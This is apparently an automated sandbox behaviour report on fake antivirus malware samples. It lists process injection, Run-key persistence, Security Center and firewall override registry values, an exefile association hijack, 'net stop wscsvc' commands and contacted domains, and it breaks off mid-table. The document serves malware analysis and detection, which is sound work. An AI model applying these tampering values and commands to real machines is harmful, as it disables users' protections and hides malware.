Token: SeAuditPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeChangeNotifyPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeSyncAgentPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeEnableDelegationPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeImpersonatePrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeCreateGlobalPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4372 wrote to memory of 2500 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\PCDefender.exe C:\Windows\SysWOW64\msiexec.exe
PID 4372 wrote to memory of 2500 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\PCDefender.exe C:\Windows\SysWOW64\msiexec.exe
PID 4372 wrote to memory of 2500 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\PCDefender.exe C:\Windows\SysWOW64\msiexec.exe
PID 2856 wrote to memory of 1468 N/A C:\Windows\system32\msiexec.exe C:\Windows\system32\srtasks.exe
PID 2856 wrote to memory of 1468 N/A C:\Windows\system32\msiexec.exe C:\Windows\system32\srtasks.exe
PID 2856 wrote to memory of 1220 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 4212 wrote to memory of 3724 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4212 wrote to memory of 920 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4212 wrote to memory of 3804 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4212 wrote to memory of 5024 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe

Uses Volume Shadow Copy service COM API

ransomware

Processes

C:\Users\Admin\AppData\Local\Temp\Fake AV\PCDefender.exe

"C:\Users\Admin\AppData\Local\Temp\Fake AV\PCDefender.exe"

C:\Windows\SysWOW64\msiexec.exe

"C:\Windows\System32\msiexec.exe" /i "C:\Users\Admin\AppData\Local\Temp\RarSFX0\PCDefenderSilentSetup.msi"

C:\Windows\system32\msiexec.exe

C:\Windows\system32\msiexec.exe /V

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssvc.exe

C:\Windows\system32\srtasks.exe

C:\Windows\system32\srtasks.exe ExecuteScopeRestorePoint /WaitForRestorePoint:2

C:\Windows\syswow64\MsiExec.exe

C:\Windows\syswow64\MsiExec.exe -Embedding EDB8E2C4D105E8B14E8F9980575AC7AF E Global\MSI0000

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffaa8489758,0x7ffaa8489768,0x7ffaa8489778

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1752 --field-trial-handle=1916,i,17749516175133300583,9419090901374229005,131072 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2184 --field-trial-handle=1916,i,17749516175133300583,9419090901374229005,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2264 --field-trial-handle=1916,i,17749516175133300583,9419090901374229005,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3028 --field-trial-handle=1916,i,17749516175133300583,9419090901374229005,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3036 --field-trial-handle=1916,i,17749516175133300583,9419090901374229005,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe

"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4528 --field-trial-handle=1916,i,17749516175133300583,9419090901374229005,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5144 --field-trial-handle=1916,i,17749516175133300583,9419090901374229005,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5108 --field-trial-handle=1916,i,17749516175133300583,9419090901374229005,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5108 --field-trial-handle=1916,i,17749516175133300583,9419090901374229005,131072 /prefetch:8

Network

Country Destination Domain Proto
US 8.8.8.8:53 73.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 9.228.82.20.in-addr.arpa udp
US 8.8.8.8:53 173.178.17.96.in-addr.arpa udp
US 8.8.8.8:53 26.35.223.20.in-addr.arpa udp
US 8.8.8.8:53 41.110.16.96.in-addr.arpa udp
US 8.8.8.8:53 183.59.114.20.in-addr.arpa udp
US 8.8.8.8:53 18.31.95.13.in-addr.arpa udp
US 8.8.8.8:53 134.71.91.104.in-addr.arpa udp
US 8.8.8.8:53 178.223.142.52.in-addr.arpa udp
US 8.8.8.8:53 114.110.16.96.in-addr.arpa udp
US 8.8.8.8:53 194.178.17.96.in-addr.arpa udp
US 8.8.8.8:53 21.236.111.52.in-addr.arpa udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
US 8.8.8.8:53 www.google.com udp
GB 172.217.16.228:443 www.google.com udp
GB 172.217.16.228:443 www.google.com tcp
US 8.8.8.8:53 67.204.58.216.in-addr.arpa udp
US 8.8.8.8:53 10.178.250.142.in-addr.arpa udp
US 8.8.8.8:53 228.16.217.172.in-addr.arpa udp
US 8.8.8.8:53 clients2.google.com udp
GB 142.250.200.14:443 clients2.google.com udp
GB 142.250.200.14:443 clients2.google.com tcp
N/A 224.0.0.251:5353 udp
US 8.8.8.8:53 14.200.250.142.in-addr.arpa udp
US 8.8.8.8:53 252.15.104.51.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\RarSFX0\PCDefenderSilentSetup.msi

C:\Windows\Installer\{FC2ABC8E-3715-4A32-B8B5-559380F45282}\_3F16219B047CF8432B7ADA.exe

C:\Config.Msi\e5811e0.rbs

\??\Volume{ef7552f8-0000-0000-0000-d01200000000}\System Volume Information\SPP\OnlineMetadataCache\{f2fc0da7-0319-4d25-a2d3-2d4826c35753}_OnDiskSnapshotProp

\??\GLOBALROOT\Device\HarddiskVolumeShadowCopy2\System Volume Information\SPP\metadata-2

\??\PIPE\wkssvc

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\persisted_first_party_sets.json

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences

Analysis: behavioral5

Detonation Overview

Submitted

2024-03-02 22:34

Reported

2024-03-02 22:38

Platform

win7-20240221-en

Max time kernel

150s

Max time network

143s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Fake AV\Antivirus.exe"

Signatures

Reads user/profile data of web browsers

spyware stealer

Adds Run key to start application

persistence

Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-2461186416-2307104501-1787948496-1000\Software\Microsoft\Windows\CurrentVersion\Run\Antivirus = "\"C:\\Program Files (x86)\\AnVi\\avt.exe\" -noscan" C:\Users\Admin\AppData\Local\Temp\Fake AV\Antivirus.exe N/A

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\O: C:\Users\Admin\AppData\Local\Temp\Fake AV\Antivirus.exe N/A
File opened (read-only) \??\Q: C:\Users\Admin\AppData\Local\Temp\Fake AV\Antivirus.exe N/A
File opened (read-only) \??\S: C:\Users\Admin\AppData\Local\Temp\Fake AV\Antivirus.exe N/A
File opened (read-only) \??\Y: C:\Users\Admin\AppData\Local\Temp\Fake AV\Antivirus.exe N/A
File opened (read-only) \??\U: C:\Users\Admin\AppData\Local\Temp\Fake AV\Antivirus.exe N/A
File opened (read-only) \??\W: C:\Users\Admin\AppData\Local\Temp\Fake AV\Antivirus.exe N/A
File opened (read-only) \??\E: C:\Users\Admin\AppData\Local\Temp\Fake AV\Antivirus.exe N/A
File opened (read-only) \??\H: C:\Users\Admin\AppData\Local\Temp\Fake AV\Antivirus.exe N/A
File opened (read-only) \??\I: C:\Users\Admin\AppData\Local\Temp\Fake AV\Antivirus.exe N/A
File opened (read-only) \??\K: C:\Users\Admin\AppData\Local\Temp\Fake AV\Antivirus.exe N/A
File opened (read-only) \??\P: C:\Users\Admin\AppData\Local\Temp\Fake AV\Antivirus.exe N/A
File opened (read-only) \??\X: C:\Users\Admin\AppData\Local\Temp\Fake AV\Antivirus.exe N/A
File opened (read-only) \??\B: C:\Users\Admin\AppData\Local\Temp\Fake AV\Antivirus.exe N/A
File opened (read-only) \??\L: C:\Users\Admin\AppData\Local\Temp\Fake AV\Antivirus.exe N/A
File opened (read-only) \??\R: C:\Users\Admin\AppData\Local\Temp\Fake AV\Antivirus.exe N/A
File opened (read-only) \??\T: C:\Users\Admin\AppData\Local\Temp\Fake AV\Antivirus.exe N/A
File opened (read-only) \??\V: C:\Users\Admin\AppData\Local\Temp\Fake AV\Antivirus.exe N/A
File opened (read-only) \??\Z: C:\Users\Admin\AppData\Local\Temp\Fake AV\Antivirus.exe N/A
File opened (read-only) \??\A: C:\Users\Admin\AppData\Local\Temp\Fake AV\Antivirus.exe N/A
File opened (read-only) \??\G: C:\Users\Admin\AppData\Local\Temp\Fake AV\Antivirus.exe N/A
File opened (read-only) \??\J: C:\Users\Admin\AppData\Local\Temp\Fake AV\Antivirus.exe N/A
File opened (read-only) \??\M: C:\Users\Admin\AppData\Local\Temp\Fake AV\Antivirus.exe N/A
File opened (read-only) \??\N: C:\Users\Admin\AppData\Local\Temp\Fake AV\Antivirus.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files (x86)\AnVi\splash.mp3 C:\Users\Admin\AppData\Local\Temp\Fake AV\Antivirus.exe N/A
File created C:\Program Files (x86)\AnVi\virus.mp3 C:\Users\Admin\AppData\Local\Temp\Fake AV\Antivirus.exe N/A

Enumerates physical storage devices

Modifies Internet Explorer settings

adware spyware

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-2461186416-2307104501-1787948496-1000\Software\Microsoft\Internet Explorer\Main C:\Users\Admin\AppData\Local\Temp\Fake AV\Antivirus.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2461186416-2307104501-1787948496-1000\Software\Microsoft\Internet Explorer\Main\Use FormSuggest = "Yes" C:\Users\Admin\AppData\Local\Temp\Fake AV\Antivirus.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2461186416-2307104501-1787948496-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch C:\Users\Admin\AppData\Local\Temp\Fake AV\Antivirus.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2461186416-2307104501-1787948496-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" C:\Users\Admin\AppData\Local\Temp\Fake AV\Antivirus.exe N/A

Runs net.exe

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\Antivirus.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\Antivirus.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\Wbem\mofcomp.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\Antivirus.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\Antivirus.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2004 wrote to memory of 2232 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\Antivirus.exe C:\Windows\SysWOW64\net.exe
PID 2004 wrote to memory of 2500 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\Antivirus.exe C:\Windows\SysWOW64\net.exe
PID 2004 wrote to memory of 2628 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\Antivirus.exe C:\Windows\SysWOW64\net.exe
PID 2004 wrote to memory of 2380 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\Antivirus.exe C:\Windows\SysWOW64\net.exe
PID 2004 wrote to memory of 620 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\Antivirus.exe C:\Windows\SysWOW64\Wbem\mofcomp.exe
PID 2628 wrote to memory of 2464 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 2500 wrote to memory of 2848 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 2380 wrote to memory of 2540 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 2232 wrote to memory of 2428 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe

Processes

C:\Users\Admin\AppData\Local\Temp\Fake AV\Antivirus.exe

"C:\Users\Admin\AppData\Local\Temp\Fake AV\Antivirus.exe"

C:\Windows\SysWOW64\net.exe

net stop wscsvc

C:\Windows\SysWOW64\net.exe

net stop winmgmt /y

C:\Windows\SysWOW64\net.exe

net start winmgmt

C:\Windows\SysWOW64\net.exe

net start wscsvc

C:\Windows\SysWOW64\Wbem\mofcomp.exe

mofcomp C:\Users\Admin\AppData\Local\Temp\4otjesjty.mof

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 start winmgmt

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop winmgmt /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 start wscsvc

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop wscsvc

Network

Country Destination Domain Proto
US 8.8.8.8:53 searchdusty.com udp
CA 54.39.157.64:80 searchdusty.com tcp
US 8.8.8.8:53 fastsofgeld.com udp
US 8.8.8.8:53 highway-traffic.com udp
US 8.8.8.8:53 frequentwin.com udp
CA 54.39.157.64:80 searchdusty.com tcp
CA 54.39.157.64:80 searchdusty.com tcp
US 8.8.8.8:53 computernewb.com udp
US 104.21.69.77:443 computernewb.com tcp
US 104.21.69.77:443 computernewb.com tcp
US 8.8.8.8:53 static.cloudflareinsights.com udp
US 104.16.57.101:443 static.cloudflareinsights.com tcp

Files

C:\Users\Admin\AppData\Local\Temp\4otjesjty.mof

MD5 7fad92afda308dca8acfc6ff45c80c24
SHA1 a7fa35e7f90f772fc943c2e940737a48b654c295
SHA256 76e19416eb826a27bdcf626c3877cf7812bbe9b62cc2ccc5c2f65461d644246f
SHA512 49eed1e1197401cb856064bf7fdbd9f3bc57f3c864d47f509346d44eed3b54757d8c6cdb6254990d21291065f0762d2a1588d09e43c5728f77a420f6a8dcd6ea

memory/2004-16-0x000000006F8A0000-0x000000006FBB2000-memory.dmp

memory/2004-17-0x00000000078C0000-0x00000000078C1000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\CabAFD1.tmp

MD5 ac05d27423a85adc1622c714f2cb6184
SHA1 b0fe2b1abddb97837ea0195be70ab2ff14d43198
SHA256 c6456e12e5e53287a547af4103e0397cb9697e466cf75844312dc296d43d144d
SHA512 6d0ef9050e41fbae680e0e59dd0f90b6ac7fea5579ef5708b69d5da33a0ece7e8b16574b58b17b64a34cc34a4ffc22b4a62c1ece61f36c4a11a0665e0536b90d

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015

MD5 753df6889fd7410a2e9fe333da83a429
SHA1 3c425f16e8267186061dd48ac1c77c122962456e
SHA256 b42dc237e44cbc9a43400e7d3f9cbd406dbdefd62bfe87328f8663897d69df78
SHA512 9d56f79410ad0cf852c74c3ef9454e7ae86e80bdd6ff67773994b48ccac71142bcf5c90635da6a056e1406e81e64674db9584928e867c55b77b59e2851cf6444

C:\Users\Admin\AppData\Local\Temp\TarB1BC.tmp

MD5 dd73cead4b93366cf3465c8cd32e2796
SHA1 74546226dfe9ceb8184651e920d1dbfb432b314e
SHA256 a6752b7851b591550e4625b832a393aabcc428de18d83e8593cd540f7d7cae22
SHA512 ce1bdd595065c94fa528badf4a6a8777893807d6789267612755df818ba6ffe55e4df429710aea29526ee4aa8ef20e25f2f05341da53992157d21ae032c0fb63

C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\U4VLHPRO\pixelplay[1].woff

MD5 b49e517a8e3605250d8a4231554c1b57
SHA1 6da51af721bbb147c682f64c130ad97e336d1179
SHA256 86f273658594b1fc14337bff6945402bc90cc6b67989b757d0146d83bb07260d
SHA512 d4ce376ee0af2244de6ca039bafffa627cb5f795951d9cc4d2f01a0e65f5804d18909148f057edbc0f645072229120dbb8b31165254279fd6bbacf0c9a9acc66

C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\NXAFS242\v84a3a4012de94ce1a686ba8c167c359c1696973893317[1].js

MD5 dd1d068fdb5fe90b6c05a5b3940e088c
SHA1 0d96f9df8772633a9df4c81cf323a4ef8998ba59
SHA256 6153d13804862b0fc1c016cf1129f34cb7c6185f2cf4bf1a3a862eecdab50101
SHA512 7aea051a8c2195a2ea5ec3d6438f2a4a4052085b370cf4728b056edc58d1f7a70c3f1f85afe82959184869f707c2ac02a964b8d9166122e74ebc423e0a47fa30

C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\IKDEMF4Q\index[1].js

MD5 d6ccc01f5e7ffed0e34b710cc8f94aea
SHA1 d8eebefa67f1b3ba5b4774450514063e2f5f0e84
SHA256 13fee64f85f9ed03819cfb90371daea36ab141bc8b6d109b54d6f88dd15b9928
SHA512 606b29db366da0738e5c918b7e872c1882ddd5ebec106179f2b599694aad1bca03833940cf11aa9fcef77d555ac89de573f6c358c083d9162e899a682df2ec58

memory/2004-114-0x000000006F8A0000-0x000000006FBB2000-memory.dmp

memory/2004-115-0x00000000078C0000-0x00000000078C1000-memory.dmp

Analysis: behavioral7

Detonation Overview

Submitted

2024-03-02 22:34

Reported

2024-03-02 22:38

Platform

win7-20240221-en

Max time kernel

150s

Max time network

134s

Command Line

C:\Windows\system32\svchost.exe -k NetworkService

Signatures

Modifies security service

evasion
Description Indicator Process Target
Set value (data) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\MpsSvc\Parameters\PortKeywords\DHCP\Collection N/A N/A
Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wscsvc\Start = "4" C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\MpsSvc\Parameters\PortKeywords\DHCP N/A N/A

Windows security bypass

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Security Center\Svc\AntiVirusOverride = "1" C:\Windows\system32\svchost.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Security Center\FirewallOverride = "1" C:\Windows\system32\svchost.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Security Center\AntiVirusOverride = "1" C:\Windows\system32\svchost.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Security Center\Svc\FirewallOverride = "1" C:\Windows\system32\svchost.exe N/A

Sets service image path in registry

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\userinit\ImagePath = "\\\\.\\globalroot\\systemroot\\system32\\usеrinit.exe" \??\globalroot\systemroot\system32\usеrinit.exe N/A

Deletes itself

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A \??\globalroot\systemroot\system32\usеrinit.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\Antivirus2010.exe N/A

Modifies system executable filetype association

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\open\command\ = "\"exefile\" /shell <%1> %*" C:\Windows\system32\svchost.exe N/A

Checks installed software on the system

discovery

Checks registry for disk virtualization

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet002\Enum\SCSI\Disk&Ven_Dell&Prod_VIRTUAL_DISK C:\Windows\system32\svchost.exe N/A

Enumerates connected drives

Description Indicator Process Target
